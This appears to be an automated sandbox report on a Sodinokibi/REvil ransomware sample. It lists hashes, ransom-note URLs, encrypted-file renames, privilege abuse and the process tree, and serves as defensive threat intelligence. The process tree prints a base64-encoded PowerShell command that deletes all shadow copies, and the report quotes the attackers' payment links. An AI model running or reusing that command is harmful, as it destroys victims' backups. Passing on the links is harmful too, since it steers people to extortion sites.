Analysis
-
max time kernel
102s -
max time network
114s -
platform
windows7_x64 -
resource
win7 -
submitted
03-08-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
ransomware.exe
Resource
win7
Behavioral task
behavioral2
Sample
ransomware.exe
Resource
win10v200722
General
-
Target
ransomware.exe
-
Size
116KB
-
MD5
b86ad4241b01376b3924a380f6f4c934
-
SHA1
10682d08a18715a79ee23b58fdb6ee44c4e28c61
-
SHA256
14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708
-
SHA512
54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9
Malware Config
Extracted
C:\2d177g-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7084D32C9ADE1A6C
http://decryptor.cc/7084D32C9ADE1A6C
Signatures
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ransomware.exedescription ioc process File renamed C:\Users\Admin\Pictures\EditExpand.png => \??\c:\users\admin\pictures\EditExpand.png.2d177g ransomware.exe File renamed C:\Users\Admin\Pictures\InvokeConvert.tiff => \??\c:\users\admin\pictures\InvokeConvert.tiff.2d177g ransomware.exe File renamed C:\Users\Admin\Pictures\ResumeAssert.crw => \??\c:\users\admin\pictures\ResumeAssert.crw.2d177g ransomware.exe File renamed C:\Users\Admin\Pictures\SwitchImport.png => \??\c:\users\admin\pictures\SwitchImport.png.2d177g ransomware.exe File opened for modification \??\c:\users\admin\pictures\InvokeConvert.tiff ransomware.exe File renamed C:\Users\Admin\Pictures\DisableInitialize.crw => \??\c:\users\admin\pictures\DisableInitialize.crw.2d177g ransomware.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
ransomware.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7yvs.bmp" ransomware.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
ransomware.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1124 ransomware.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeBackupPrivilege 1512 vssvc.exe Token: SeRestorePrivilege 1512 vssvc.exe Token: SeAuditPrivilege 1512 vssvc.exe Token: SeTakeOwnershipPrivilege 1124 ransomware.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
ransomware.exepowershell.exepid process 1124 ransomware.exe 1308 powershell.exe 1308 powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 27 IoCs
Processes:
ransomware.exedescription ioc process File opened for modification \??\c:\program files\PushSelect.dxf ransomware.exe File opened for modification \??\c:\program files\ReceiveUpdate.3gp2 ransomware.exe File opened for modification \??\c:\program files\SelectWrite.gif ransomware.exe File created \??\c:\program files (x86)\2d177g-readme.txt ransomware.exe File opened for modification \??\c:\program files\ImportPush.xsl ransomware.exe File opened for modification \??\c:\program files\OptimizeSplit.rle ransomware.exe File opened for modification \??\c:\program files\PushComplete.tiff ransomware.exe File opened for modification \??\c:\program files\NewEnter.xhtml ransomware.exe File opened for modification \??\c:\program files\ResetUninstall.ogg ransomware.exe File opened for modification \??\c:\program files\ShowEdit.html ransomware.exe File opened for modification \??\c:\program files\UninstallResume.mp3 ransomware.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2d177g-readme.txt ransomware.exe File opened for modification \??\c:\program files\ApproveSkip.otf ransomware.exe File opened for modification \??\c:\program files\CopyResize.vsw ransomware.exe File created \??\c:\program files\microsoft sql server compact edition\2d177g-readme.txt ransomware.exe File opened for modification \??\c:\program files\EditGroup.mov ransomware.exe File opened for modification \??\c:\program files\InstallCheckpoint.wmf ransomware.exe File opened for modification \??\c:\program files\RemoveInstall.vsx ransomware.exe File opened for modification \??\c:\program files\SyncInvoke.mp2v ransomware.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\2d177g-readme.txt ransomware.exe File opened for modification \??\c:\program files\PingDisable.ppt ransomware.exe File opened for modification \??\c:\program files\TraceAssert.vstx ransomware.exe File opened for modification \??\c:\program files\UnpublishPop.mpv2 ransomware.exe File created \??\c:\program files\2d177g-readme.txt ransomware.exe File opened for modification \??\c:\program files\InstallShow.TTS ransomware.exe File opened for modification \??\c:\program files\ProtectRedo.wma ransomware.exe File opened for modification \??\c:\program files\ConvertOptimize.M2T ransomware.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
ransomware.exedescription pid process target process PID 1124 wrote to memory of 1308 1124 ransomware.exe powershell.exe PID 1124 wrote to memory of 1308 1124 ransomware.exe powershell.exe PID 1124 wrote to memory of 1308 1124 ransomware.exe powershell.exe PID 1124 wrote to memory of 1308 1124 ransomware.exe powershell.exe -
Enumerates connected drives 3 TTPs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ransomware.exe"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1308
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1496
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1512